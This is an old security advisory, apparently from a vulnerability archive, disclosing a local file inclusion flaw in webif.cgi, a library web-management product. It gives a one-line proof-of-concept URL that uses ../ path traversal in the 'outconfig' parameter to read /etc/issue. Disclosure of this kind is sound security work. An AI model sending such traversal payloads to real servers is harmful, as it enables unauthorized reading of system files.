Webif.cgi local file inclusion

2007-06-18T00:00:00
ID SECURITYVULNS:DOC:17287
Type securityvulns
Reporter Securityvulns
Modified 2007-06-18T00:00:00

Description

.:: WEBIF.CGI LOCALE FILE INCLUSION ::.

[#] AUTHOR: maiosyet [#] CONTACT: maiosyet@mawk.org [#] SITE: http://www.mawk.org

[#] ORIGINAL ADV: http://www.mawk.org/mods.php?mods=Core&page=view&id=102

[#] SOFTWARE: Webif.cgi http://www.ifnet.it/webif/

[#] DESCRIPTION: Webif is the natural solution for librarianships who want visibility across the web or would like to manage Intranet networks, the whole at a reasonable price.

[#] BUG: Input passed to the "outconfig" parameter in webif.cgi is not properly verified. This can be exploited to include arbitrary files from local resources.

[#] PoC: http://www.site.org/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue

[#] Thanks: Einyx; Anathema, Hidden, XVII, Shatsar, Kaisentlaia and all the mawkers; black_dhalya :* Federico, Eveline (you know who you are).